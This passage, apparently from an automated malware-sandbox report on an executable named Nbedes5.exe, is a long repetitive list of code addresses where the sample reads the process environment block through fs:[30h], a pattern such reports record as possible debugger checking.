      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2EB260 mov eax, dword ptr fs:[00000030h]2_2_1E2EB260
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E308A62 mov eax, dword ptr fs:[00000030h]2_2_1E308A62
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E25AE73 mov eax, dword ptr fs:[00000030h]2_2_1E25AE73
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E25AE73 mov eax, dword ptr fs:[00000030h]2_2_1E25AE73
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E25AE73 mov eax, dword ptr fs:[00000030h]2_2_1E25AE73
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E25AE73 mov eax, dword ptr fs:[00000030h]2_2_1E25AE73
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E25AE73 mov eax, dword ptr fs:[00000030h]2_2_1E25AE73
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E27927A mov eax, dword ptr fs:[00000030h]2_2_1E27927A
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E239240 mov eax, dword ptr fs:[00000030h]2_2_1E239240
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E239240 mov eax, dword ptr fs:[00000030h]2_2_1E239240
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E239240 mov eax, dword ptr fs:[00000030h]2_2_1E239240
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E239240 mov eax, dword ptr fs:[00000030h]2_2_1E239240
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E247E41 mov eax, dword ptr fs:[00000030h]2_2_1E247E41
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E247E41 mov eax, dword ptr fs:[00000030h]2_2_1E247E41
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E247E41 mov eax, dword ptr fs:[00000030h]2_2_1E247E41
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E247E41 mov eax, dword ptr fs:[00000030h]2_2_1E247E41
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E247E41 mov eax, dword ptr fs:[00000030h]2_2_1E247E41
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E247E41 mov eax, dword ptr fs:[00000030h]2_2_1E247E41
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2C4257 mov eax, dword ptr fs:[00000030h]2_2_1E2C4257
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2352A5 mov eax, dword ptr fs:[00000030h]2_2_1E2352A5
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2352A5 mov eax, dword ptr fs:[00000030h]2_2_1E2352A5
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2352A5 mov eax, dword ptr fs:[00000030h]2_2_1E2352A5
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2352A5 mov eax, dword ptr fs:[00000030h]2_2_1E2352A5
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2352A5 mov eax, dword ptr fs:[00000030h]2_2_1E2352A5
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2B46A7 mov eax, dword ptr fs:[00000030h]2_2_1E2B46A7
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E24AAB0 mov eax, dword ptr fs:[00000030h]2_2_1E24AAB0
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E24AAB0 mov eax, dword ptr fs:[00000030h]2_2_1E24AAB0
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E300EA5 mov eax, dword ptr fs:[00000030h]2_2_1E300EA5
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E300EA5 mov eax, dword ptr fs:[00000030h]2_2_1E300EA5
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E300EA5 mov eax, dword ptr fs:[00000030h]2_2_1E300EA5
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E26FAB0 mov eax, dword ptr fs:[00000030h]2_2_1E26FAB0
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2CFE87 mov eax, dword ptr fs:[00000030h]2_2_1E2CFE87
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E26D294 mov eax, dword ptr fs:[00000030h]2_2_1E26D294
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E26D294 mov eax, dword ptr fs:[00000030h]2_2_1E26D294
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2616E0 mov ecx, dword ptr fs:[00000030h]2_2_1E2616E0
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2476E2 mov eax, dword ptr fs:[00000030h]2_2_1E2476E2
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E278EC7 mov eax, dword ptr fs:[00000030h]2_2_1E278EC7
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E308ED6 mov eax, dword ptr fs:[00000030h]2_2_1E308ED6
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2636CC mov eax, dword ptr fs:[00000030h]2_2_1E2636CC
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2EFEC0 mov eax, dword ptr fs:[00000030h]2_2_1E2EFEC0
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E234F2E mov eax, dword ptr fs:[00000030h]2_2_1E234F2E
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E234F2E mov eax, dword ptr fs:[00000030h]2_2_1E234F2E
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E26E730 mov eax, dword ptr fs:[00000030h]2_2_1E26E730
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E26A70E mov eax, dword ptr fs:[00000030h]2_2_1E26A70E
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E26A70E mov eax, dword ptr fs:[00000030h]2_2_1E26A70E
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2F131B mov eax, dword ptr fs:[00000030h]2_2_1E2F131B
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2CFF10 mov eax, dword ptr fs:[00000030h]2_2_1E2CFF10
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2CFF10 mov eax, dword ptr fs:[00000030h]2_2_1E2CFF10
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E30070D mov eax, dword ptr fs:[00000030h]2_2_1E30070D
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E30070D mov eax, dword ptr fs:[00000030h]2_2_1E30070D
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E23DB60 mov ecx, dword ptr fs:[00000030h]2_2_1E23DB60
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E24FF60 mov eax, dword ptr fs:[00000030h]2_2_1E24FF60
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E308F6A mov eax, dword ptr fs:[00000030h]2_2_1E308F6A
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E263B7A mov eax, dword ptr fs:[00000030h]2_2_1E263B7A
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E263B7A mov eax, dword ptr fs:[00000030h]2_2_1E263B7A
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E23DB40 mov eax, dword ptr fs:[00000030h]2_2_1E23DB40
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E24EF40 mov eax, dword ptr fs:[00000030h]2_2_1E24EF40
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E308B58 mov eax, dword ptr fs:[00000030h]2_2_1E308B58
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E23F358 mov eax, dword ptr fs:[00000030h]2_2_1E23F358
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E305BA5 mov eax, dword ptr fs:[00000030h]2_2_1E305BA5
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2F138A mov eax, dword ptr fs:[00000030h]2_2_1E2F138A
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E241B8F mov eax, dword ptr fs:[00000030h]2_2_1E241B8F
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E241B8F mov eax, dword ptr fs:[00000030h]2_2_1E241B8F
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2ED380 mov ecx, dword ptr fs:[00000030h]2_2_1E2ED380
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E26B390 mov eax, dword ptr fs:[00000030h]2_2_1E26B390
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2B7794 mov eax, dword ptr fs:[00000030h]2_2_1E2B7794
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2B7794 mov eax, dword ptr fs:[00000030h]2_2_1E2B7794
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2B7794 mov eax, dword ptr fs:[00000030h]2_2_1E2B7794
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2737F5 mov eax, dword ptr fs:[00000030h]2_2_1E2737F5
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E26BC2C mov eax, dword ptr fs:[00000030h]2_2_1E26BC2C
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E24B02A mov eax, dword ptr fs:[00000030h]2_2_1E24B02A
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E24B02A mov eax, dword ptr fs:[00000030h]2_2_1E24B02A
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E24B02A mov eax, dword ptr fs:[00000030h]2_2_1E24B02A
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E24B02A mov eax, dword ptr fs:[00000030h]2_2_1E24B02A
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2B6C0A mov eax, dword ptr fs:[00000030h]2_2_1E2B6C0A
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2B6C0A mov eax, dword ptr fs:[00000030h]2_2_1E2B6C0A
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2B6C0A mov eax, dword ptr fs:[00000030h]2_2_1E2B6C0A
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2B6C0A mov eax, dword ptr fs:[00000030h]2_2_1E2B6C0A
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E304015 mov eax, dword ptr fs:[00000030h]2_2_1E304015
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E304015 mov eax, dword ptr fs:[00000030h]2_2_1E304015
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]2_2_1E2F1C06
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]2_2_1E2F1C06
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]2_2_1E2F1C06
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]2_2_1E2F1C06
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]2_2_1E2F1C06
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]2_2_1E2F1C06
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]2_2_1E2F1C06
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]2_2_1E2F1C06
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]2_2_1E2F1C06
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]2_2_1E2F1C06
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]2_2_1E2F1C06
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]2_2_1E2F1C06
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]2_2_1E2F1C06
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]2_2_1E2F1C06
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2B7016 mov eax, dword ptr fs:[00000030h]2_2_1E2B7016
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2B7016 mov eax, dword ptr fs:[00000030h]2_2_1E2B7016
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2B7016 mov eax, dword ptr fs:[00000030h]2_2_1E2B7016
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E30740D mov eax, dword ptr fs:[00000030h]2_2_1E30740D
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E30740D mov eax, dword ptr fs:[00000030h]2_2_1E30740D
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E30740D mov eax, dword ptr fs:[00000030h]2_2_1E30740D
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E301074 mov eax, dword ptr fs:[00000030h]2_2_1E301074
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E25746D mov eax, dword ptr fs:[00000030h]2_2_1E25746D
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2F2073 mov eax, dword ptr fs:[00000030h]2_2_1E2F2073
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E26A44B mov eax, dword ptr fs:[00000030h]2_2_1E26A44B
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E250050 mov eax, dword ptr fs:[00000030h]2_2_1E250050
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E250050 mov eax, dword ptr fs:[00000030h]2_2_1E250050
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2CC450 mov eax, dword ptr fs:[00000030h]2_2_1E2CC450
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2CC450 mov eax, dword ptr fs:[00000030h]2_2_1E2CC450
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2790AF mov eax, dword ptr fs:[00000030h]2_2_1E2790AF
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E26F0BF mov ecx, dword ptr fs:[00000030h]2_2_1E26F0BF
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E26F0BF mov eax, dword ptr fs:[00000030h]2_2_1E26F0BF
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E26F0BF mov eax, dword ptr fs:[00000030h]2_2_1E26F0BF
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E239080 mov eax, dword ptr fs:[00000030h]2_2_1E239080
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2B3884 mov eax, dword ptr fs:[00000030h]2_2_1E2B3884
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2B3884 mov eax, dword ptr fs:[00000030h]2_2_1E2B3884
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E24849B mov eax, dword ptr fs:[00000030h]2_2_1E24849B
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2F14FB mov eax, dword ptr fs:[00000030h]2_2_1E2F14FB
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2B6CF0 mov eax, dword ptr fs:[00000030h]2_2_1E2B6CF0
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2B6CF0 mov eax, dword ptr fs:[00000030h]2_2_1E2B6CF0
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2B6CF0 mov eax, dword ptr fs:[00000030h]2_2_1E2B6CF0
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E308CD6 mov eax, dword ptr fs:[00000030h]2_2_1E308CD6
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2CB8D0 mov eax, dword ptr fs:[00000030h]2_2_1E2CB8D0
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2CB8D0 mov ecx, dword ptr fs:[00000030h]2_2_1E2CB8D0
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2CB8D0 mov eax, dword ptr fs:[00000030h]2_2_1E2CB8D0
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2CB8D0 mov eax, dword ptr fs:[00000030h]2_2_1E2CB8D0
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2CB8D0 mov eax, dword ptr fs:[00000030h]2_2_1E2CB8D0
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2CB8D0 mov eax, dword ptr fs:[00000030h]2_2_1E2CB8D0
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E308D34 mov eax, dword ptr fs:[00000030h]2_2_1E308D34
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E254120 mov eax, dword ptr fs:[00000030h]2_2_1E254120
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E254120 mov eax, dword ptr fs:[00000030h]2_2_1E254120
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E254120 mov eax, dword ptr fs:[00000030h]2_2_1E254120
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E254120 mov eax, dword ptr fs:[00000030h]2_2_1E254120
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E254120 mov ecx, dword ptr fs:[00000030h]2_2_1E254120
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E243D34 mov eax, dword ptr fs:[00000030h]2_2_1E243D34
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E243D34 mov eax, dword ptr fs:[00000030h]2_2_1E243D34
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E243D34 mov eax, dword ptr fs:[00000030h]2_2_1E243D34
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E243D34 mov eax, dword ptr fs:[00000030h]2_2_1E243D34
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E243D34 mov eax, dword ptr fs:[00000030h]2_2_1E243D34
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E243D34 mov eax, dword ptr fs:[00000030h]2_2_1E243D34
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E243D34 mov eax, dword ptr fs:[00000030h]2_2_1E243D34
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E243D34 mov eax, dword ptr fs:[00000030h]2_2_1E243D34
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E243D34 mov eax, dword ptr fs:[00000030h]2_2_1E243D34
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E243D34 mov eax, dword ptr fs:[00000030h]2_2_1E243D34
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E243D34 mov eax, dword ptr fs:[00000030h]2_2_1E243D34
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E243D34 mov eax, dword ptr fs:[00000030h]2_2_1E243D34
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E243D34 mov eax, dword ptr fs:[00000030h]2_2_1E243D34
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E23AD30 mov eax, dword ptr fs:[00000030h]2_2_1E23AD30
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E26513A mov eax, dword ptr fs:[00000030h]2_2_1E26513A
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E26513A mov eax, dword ptr fs:[00000030h]2_2_1E26513A
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2BA537 mov eax, dword ptr fs:[00000030h]2_2_1E2BA537
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E264D3B mov eax, dword ptr fs:[00000030h]2_2_1E264D3B
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E264D3B mov eax, dword ptr fs:[00000030h]2_2_1E264D3B
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E264D3B mov eax, dword ptr fs:[00000030h]2_2_1E264D3B
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E239100 mov eax, dword ptr fs:[00000030h]2_2_1E239100
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E239100 mov eax, dword ptr fs:[00000030h]2_2_1E239100
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E239100 mov eax, dword ptr fs:[00000030h]2_2_1E239100
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E23C962 mov eax, dword ptr fs:[00000030h]2_2_1E23C962
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E23B171 mov eax, dword ptr fs:[00000030h]2_2_1E23B171
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E23B171 mov eax, dword ptr fs:[00000030h]2_2_1E23B171
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E25C577 mov eax, dword ptr fs:[00000030h]2_2_1E25C577
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E25C577 mov eax, dword ptr fs:[00000030h]2_2_1E25C577
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E25B944 mov eax, dword ptr fs:[00000030h]2_2_1E25B944
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E25B944 mov eax, dword ptr fs:[00000030h]2_2_1E25B944
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E273D43 mov eax, dword ptr fs:[00000030h]2_2_1E273D43
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2B3540 mov eax, dword ptr fs:[00000030h]2_2_1E2B3540
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E257D50 mov eax, dword ptr fs:[00000030h]2_2_1E257D50
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2661A0 mov eax, dword ptr fs:[00000030h]2_2_1E2661A0
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2661A0 mov eax, dword ptr fs:[00000030h]2_2_1E2661A0
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2635A1 mov eax, dword ptr fs:[00000030h]2_2_1E2635A1
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E26A185 mov eax, dword ptr fs:[00000030h]2_2_1E26A185
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E25C182 mov eax, dword ptr fs:[00000030h]2_2_1E25C182
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E232D8A mov eax, dword ptr fs:[00000030h]2_2_1E232D8A
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E232D8A mov eax, dword ptr fs:[00000030h]2_2_1E232D8A
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E232D8A mov eax, dword ptr fs:[00000030h]2_2_1E232D8A
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E232D8A mov eax, dword ptr fs:[00000030h]2_2_1E232D8A
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E232D8A mov eax, dword ptr fs:[00000030h]2_2_1E232D8A
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E26FD9B mov eax, dword ptr fs:[00000030h]2_2_1E26FD9B
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E26FD9B mov eax, dword ptr fs:[00000030h]2_2_1E26FD9B
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E23B1E1 mov eax, dword ptr fs:[00000030h]2_2_1E23B1E1
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E23B1E1 mov eax, dword ptr fs:[00000030h]2_2_1E23B1E1
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E23B1E1 mov eax, dword ptr fs:[00000030h]2_2_1E23B1E1
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2C41E8 mov eax, dword ptr fs:[00000030h]2_2_1E2C41E8
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E24D